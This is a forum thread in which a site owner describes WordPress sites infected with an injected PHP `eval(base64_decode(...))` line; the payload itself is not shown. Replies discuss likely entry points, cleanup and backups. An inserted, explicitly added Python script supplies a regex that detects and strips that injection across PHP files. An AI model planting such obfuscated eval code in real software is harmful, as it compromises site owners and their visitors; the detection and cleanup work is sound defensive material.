
Being Hacked F$$$KJ$K$JK

Discussion in 'Black Hat SEO' started by ibmethatswhoib, Feb 15, 2012.

  1. ibmethatswhoib

    What the fuck, this goddamn motherfucker hacked multiple sites of mine. How the hell did they hack multiple sites and how the hell did my host let this happen? He installed this on almost all of my PHP files. I had my sites updated with the latest WordPress and had security plugins.

    eval(base64_decode("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"));

    I know this is going to take forever and I'm losing money. FUCK what do I do?
     
  2. BlueTurtle

    Do you mean how do you get rid of this and get your sites back to normal or how do you prevent it happening again?
     
  3. navero

    Lemme help you, type base64 decoder in google, then go to hack forums, make a new account, check search for anything related to script kiddies :p. problem solved
     
  4. BlueTurtle

    It's a Joomla hack.

    Here's a fix:

    http://www.kiveo.net/blog/joomla-osa-pl-code-injection/

    Actually he seems to be attacking multiple holes, it could be one of many.

    If it's wordpress you're using try this http://www.xphp.info/security/new-threat-pokosa-malware/
     
  5. BlueTurtle

    Also, I'd recommend you study this and implement all of it http://codex.wordpress.org/Hardening_WordPress
     
  6. GraveDigger00

    It can also be injected into WordPress, I have had similar code on my sites. I had a horrible hosting company, and their shared servers overall were getting exploited and then my sites as well, multiple times. I moved my sites to new hosting, and it hasn't happened since, shocking... It could also be timthumb being exploited if a WordPress theme. Make sure to update all of your themes and plugins and versions, and change your passwords as well.
     
  7. ibmethatswhoib

    Thanks for all the replies, ya it's wordpress and I'm using different themes for sites that got hacked. It could be a plugin, I don't understand why the screen is white with a 0. It's not re-directing any traffic to anywhere so why did they hack my sites? Just to mess with people? I don't see a reason.
     
  8. n3xus

    Honestly, sometimes people pull this shit for the pure enjoyment of being a dick. Just like those bastards that make viruses just to fuck with people. It's sad that they use their intelligence for such purposes.
     
  9. BlueTurtle

    It's a pretty widespread attack so the site has probably been taken down now.

    It was most likely something like a browser exploit to build a botnet or install adware/malware/crapware/cockware
     
  10. phpbuilt

    White screen with a 0 means your default wordpress template got deleted out of your wp database, or doesn't exist anymore ... to fix it just go into wordpress backend and select a theme (should fix it).

    What was your host? Justhost is notorious for this. It could have gotten in through the host.

    It might have gotten in through your templates. For instance, even if wordpress is fully up to date with all plugins ... it is possible that your wordpress theme (if it is an old one) would rely on something like timthumbs, which was exploited ... and you need a new copy of that template with a fixed timthumbs or you can always be hacked (just updating wordpress and plugins/widgets are not enough). Stay away from templates that are no longer supported.
     
  11. phpbuilt

    That theme could be using timthumbs. Timthumbs is something that many theme developers insert into their themes to help them automatically resize images (for instance, it will take the first image in your post and resize it to a thumbnail that can be stuck on your homepage with a description of the article).

    http://blog.trendmicro.com/attacks-target-timthumb-vulnerability/ (article about timthumbs vulnerability).

    If it is not timthumbs, it could be something similar. I would suggest that you switch off the templates that are giving you problems, or find updated versions of those same templates which are sure to be fixed.
     
  12. macdonjo3

    It happens. If you're with host winds, just email them and they'll help you sort it out.
     
  13. ibmethatswhoib

    Well it sounds like I'm screwed. I have ipage and they're saying that it's my problem and I need to re-install everything. I noticed that code is all over all the php files and in some it's 30 or 40 times. I backed up my databases and I have all my images. I know I have to sync up my database with my domain. So all my content should be in my database right? I'm just not sure what is the best and least painful way of doing all this for 6 sites. Does the content just show up under the right permalinks? I'm just lost on what to do now or what to start with. FML, any help would be good.
     
  14. resistancee

    First clean your PC. Boot into safe mode, clean with Malwarebytes and ComboFix. Once you're clean, contact your host for FTP logs. Find out what he edited, remove the code he added or files he's added and install ESET NOD32!
     
  15. PHustler

    Let this be a warning to everyone.....BACKUP YOUR SITES!!!!
     
  16. ibmethatswhoib

    ya I made sure my pc was clean I ran it with multiple tools like crazy. Not sure I can remove all the code, like I said it's in pretty much every php file 30 or 40 times. I'll check the ftp logs and check out eset nod32 thanks. I think it was an automated thing cuz other sites I have weren't affected.

    and yes backup your sites, databases and everything you can. This really sucks.

     
    Last edited: Feb 16, 2012
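
The situation described in the posts above (the same `eval(base64_decode("..."));` statement repeated many times in almost every PHP file) can be measured before deciding between cleaning and reinstalling. This is an added example, not part of the thread: the function names, the sample tree and the placeholder payload are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode("...")); with either quote style and loose spacing.
INJECTION = re.compile(
    rb"""eval\s*\(\s*base64_decode\s*\(\s*(["'])[A-Za-z0-9+/=\s]*\1\s*\)\s*\)\s*;?""",
    re.IGNORECASE,
)

def scan_tree(root):
    """Return {relative_path: hit_count} for each .php file containing the pattern."""
    root = Path(root)
    report = {}
    for path in sorted(p for p in root.rglob("*.php") if p.is_file()):
        count = sum(1 for _ in INJECTION.finditer(path.read_bytes()))
        if count:
            report[path.relative_to(root).as_posix()] = count
    return report

def strip_injection(data):
    """Return (cleaned_bytes, removed_count); nothing is written to disk."""
    return INJECTION.subn(b"", data)

def demo():
    """Scan a constructed sample tree; return (report, cleaned index.php, removed)."""
    # Constructed stand-in payload; the real one is not reproduced here.
    payload = base64.b64encode(b"/* constructed placeholder */")
    inject = b'eval(base64_decode("' + payload + b'"));'
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content").mkdir()
        (root / "index.php").write_bytes(
            b"<?php " + inject * 3 + b"\nrequire 'wp-blog-header.php';\n")
        (root / "wp-content" / "functions.php").write_bytes(
            b"<?php " + inject + b"\n// theme code\n")
        (root / "wp-config.php").write_bytes(b"<?php\n// clean file\n")
        report = scan_tree(root)
        cleaned, removed = strip_injection((root / "index.php").read_bytes())
    return report, cleaned, removed

if __name__ == "__main__":
    report, cleaned, removed = demo()
    for name, count in report.items():
        print(f"{count:3d}  {name}")
    print(f"index.php: {removed} statements stripped -> {cleaned!r}")
```

A zero count does not mean a site is clean: this matches only the one pattern posted in the thread, so backdoors in other forms and the original entry point are outside what it detects.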
  17. wanfirdaus

    Can they restore yesterday's backup?
     
  18. raven123

    You should post your host here so people can safely move before something like this happens again. I hope like hell it isn't bluehost...

    I usually use BackUpWordpress to counter these situations. I get my sites mailed to me several times every day. Take a note of this.
     
  19. Dumper

    Yeah, every time I change something I back it up. If your host can't help you then there's not much else you can do other than move on and kick them fuckers to the curb. Get hostgator...
     
  20. ibmethatswhoib

    I have ipage and they SUCK, don't use them. They're slow to start, customer service sucks and they haven't helped at all. I have db backup that sends me emails too and have all my latest ones. I'm just not sure, do I just erase everything in the ftp folders, re-install wordpress and then I should be good? This is a dumb question but do databases contain all your posts and images? I guess I'm just not sure what I should delete overwrite and everything.
     